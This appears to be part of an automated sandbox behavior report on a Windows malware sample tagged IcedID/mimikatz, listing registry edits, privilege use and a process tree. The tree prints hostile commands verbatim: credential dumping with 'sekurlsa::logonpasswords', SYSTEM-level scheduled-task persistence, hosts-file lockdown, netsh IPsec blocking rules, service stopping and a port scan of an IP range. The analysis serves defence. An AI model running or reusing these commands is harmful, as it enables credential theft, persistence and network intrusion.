opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmlkkib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cbftscrnu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tgkfgfrve.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4064 cmd.exe 5028 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023be2-5.dat nsis_installer_2 behavioral2/files/0x0008000000023c05-12.dat nsis_installer_1 behavioral2/files/0x0008000000023c05-12.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cmlkkib.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" cmlkkib.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmlkkib.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" cmlkkib.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" cmlkkib.exe Key created \REGISTRY\USER\.DEFAULT\Software unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" cmlkkib.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump unnsehtzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals unnsehtzr.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" cmlkkib.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5028 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5004 schtasks.exe 1636 schtasks.exe 4716 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2556 2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2556 2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 452 cmlkkib.exe Token: SeDebugPrivilege 1984 cmlkkib.exe Token: SeDebugPrivilege 4140 vfshost.exe Token: SeDebugPrivilege 3704 unnsehtzr.exe Token: SeLockMemoryPrivilege 548 gktgmq.exe Token: SeLockMemoryPrivilege 548 gktgmq.exe Token: SeDebugPrivilege 4344 unnsehtzr.exe Token: SeDebugPrivilege 4048 unnsehtzr.exe Token: SeDebugPrivilege 1540 unnsehtzr.exe Token: SeDebugPrivilege 532 unnsehtzr.exe Token: SeDebugPrivilege 1388 unnsehtzr.exe Token: SeDebugPrivilege 1680 unnsehtzr.exe Token: SeDebugPrivilege 2124 unnsehtzr.exe Token: SeDebugPrivilege 4716 unnsehtzr.exe Token: SeDebugPrivilege 3048 unnsehtzr.exe Token: SeDebugPrivilege 3860 unnsehtzr.exe Token: SeDebugPrivilege 2256 unnsehtzr.exe Token: SeDebugPrivilege 1512 unnsehtzr.exe Token: SeDebugPrivilege 748 unnsehtzr.exe Token: SeDebugPrivilege 2364 unnsehtzr.exe Token: SeDebugPrivilege 4228 unnsehtzr.exe Token: SeDebugPrivilege 3684 unnsehtzr.exe Token: SeDebugPrivilege 1260 unnsehtzr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2556 2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe 2556 2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe 452 cmlkkib.exe 452 cmlkkib.exe 1984 cmlkkib.exe 1984 cmlkkib.exe 2188 xohudmc.exe 3496 cusoqc.exe 4048 cmlkkib.exe 4048 cmlkkib.exe 5988 cmlkkib.exe 5988 cmlkkib.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2556 wrote to memory of 4064 2556 2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe 83 PID 2556 wrote to memory of 4064 2556 2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe 83 PID 2556 wrote to memory of 4064 2556 2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe 83 PID 4064 wrote to memory of 5028 4064 cmd.exe 85 PID 4064 wrote to memory of 5028 4064 cmd.exe 85 PID 4064 wrote to memory of 5028 4064 cmd.exe 85 PID 4064 wrote to memory of 452 4064 cmd.exe 87 PID 4064 wrote to memory of 452 4064 cmd.exe 87 PID 4064 wrote to memory of 452 4064 cmd.exe 87 PID 1984 wrote to memory of 1172 1984 cmlkkib.exe 89 PID 1984 wrote to memory of 1172 1984 cmlkkib.exe 89 PID 1984 wrote to memory of 1172 1984 cmlkkib.exe 89 PID 1172 wrote to memory of 764 1172 cmd.exe 91 PID 1172 wrote to memory of 764 1172 cmd.exe 91 PID 1172 wrote to memory of 764 1172 cmd.exe 91 PID 1172 wrote to memory of 1380 1172 cmd.exe 92 PID 1172 wrote to memory of 1380 1172 cmd.exe 92 PID 1172 wrote to memory of 1380 1172 cmd.exe 92 PID 1172 wrote to memory of 4936 1172 cmd.exe 93 PID 1172 wrote to memory of 4936 1172 cmd.exe 93 PID 1172 wrote to memory of 4936 1172 cmd.exe 93 PID 1172 wrote to memory of 1472 1172 cmd.exe 94 PID 1172 wrote to memory of 1472 1172 cmd.exe 94 PID 1172 wrote to memory of 1472 1172 cmd.exe 94 PID 1172 wrote to memory of 3572 1172 cmd.exe 96 PID 1172 wrote to memory of 3572 1172 cmd.exe 96 PID 1172 wrote to memory of 3572 1172 cmd.exe 96 PID 1172 wrote to memory of 1744 1172 cmd.exe 97 PID 1172 wrote to memory of 1744 1172 cmd.exe 97 PID 1172 wrote to memory of 1744 1172 cmd.exe 97 PID 1984 wrote to memory of 2472 1984 cmlkkib.exe 98 PID 1984 wrote to memory of 2472 1984 cmlkkib.exe 98 PID 1984 wrote to memory of 2472 1984 cmlkkib.exe 98 PID 1984 wrote to memory of 3068 1984 cmlkkib.exe 100 PID 1984 wrote to memory of 3068 1984 cmlkkib.exe 100 PID 1984 wrote to memory of 3068 1984 cmlkkib.exe 100 PID 1984 wrote to memory of 3136 1984 cmlkkib.exe 102 PID 1984 wrote to memory of 3136 1984 cmlkkib.exe 102 PID 1984 wrote to memory of 3136 1984 cmlkkib.exe 102 PID 1984 wrote to memory of 3388 1984 cmlkkib.exe 111 PID 1984 wrote to memory of 3388 1984 cmlkkib.exe 111 PID 1984 wrote to memory of 3388 1984 cmlkkib.exe 111 PID 3388 wrote to memory of 3092 3388 cmd.exe 113 PID 3388 wrote to memory of 3092 3388 cmd.exe 113 PID 3388 wrote to memory of 3092 3388 cmd.exe 113 PID 3092 wrote to memory of 4056 3092 wpcap.exe 114 PID 3092 wrote to memory of 4056 3092 wpcap.exe 114 PID 3092 wrote to memory of 4056 3092 wpcap.exe 114 PID 4056 wrote to memory of 5040 4056 net.exe 116 PID 4056 wrote to memory of 5040 4056 net.exe 116 PID 4056 wrote to memory of 5040 4056 net.exe 116 PID 3092 wrote to memory of 4104 3092 wpcap.exe 117 PID 3092 wrote to memory of 4104 3092 wpcap.exe 117 PID 3092 wrote to memory of 4104 3092 wpcap.exe 117 PID 4104 wrote to memory of 2924 4104 net.exe 119 PID 4104 wrote to memory of 2924 4104 net.exe 119 PID 4104 wrote to memory of 2924 4104 net.exe 119 PID 3092 wrote to memory of 1516 3092 wpcap.exe 120 PID 3092 wrote to memory of 1516 3092 wpcap.exe 120 PID 3092 wrote to memory of 1516 3092 wpcap.exe 120 PID 1516 wrote to memory of 1588 1516 net.exe 122 PID 1516 wrote to memory of 1588 1516 net.exe 122 PID 1516 wrote to memory of 1588 1516 net.exe 122 PID 3092 wrote to memory of 5088 3092 wpcap.exe 125
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1012
-
C:\Windows\TEMP\zzuiitsrt\gktgmq.exe"C:\Windows\TEMP\zzuiitsrt\gktgmq.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:548
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\mnvzbkud\cmlkkib.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5028
-
-
C:\Windows\mnvzbkud\cmlkkib.exeC:\Windows\mnvzbkud\cmlkkib.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:452
-
-
-
C:\Windows\mnvzbkud\cmlkkib.exeC:\Windows\mnvzbkud\cmlkkib.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:764
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:1380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4936
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3572
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1744
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2472
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3068
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3136
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vsjtbfmcn\nifklhuyf\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\vsjtbfmcn\nifklhuyf\wpcap.exeC:\Windows\vsjtbfmcn\nifklhuyf\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:5040
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2924
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:1588
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:5088 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3788
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4948 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1908
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4228
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1856 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4052
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vsjtbfmcn\nifklhuyf\cbftscrnu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vsjtbfmcn\nifklhuyf\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:3124 -
C:\Windows\vsjtbfmcn\nifklhuyf\cbftscrnu.exeC:\Windows\vsjtbfmcn\nifklhuyf\cbftscrnu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vsjtbfmcn\nifklhuyf\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vsjtbfmcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\vsjtbfmcn\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1780 -
C:\Windows\vsjtbfmcn\Corporate\vfshost.exeC:\Windows\vsjtbfmcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ibvlkntti" /ru system /tr "cmd /c C:\Windows\ime\cmlkkib.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1736 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ibvlkntti" /ru system /tr "cmd /c C:\Windows\ime\cmlkkib.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rlbcmtkeu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mnvzbkud\cmlkkib.exe /p everyone:F"2⤵PID:4552
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rlbcmtkeu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mnvzbkud\cmlkkib.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:5004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nmzntiyli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\zzuiitsrt\gktgmq.exe /p everyone:F"2⤵PID:2184
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2168
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nmzntiyli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\zzuiitsrt\gktgmq.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1636
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2208
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4084
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1708
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3176
-
-
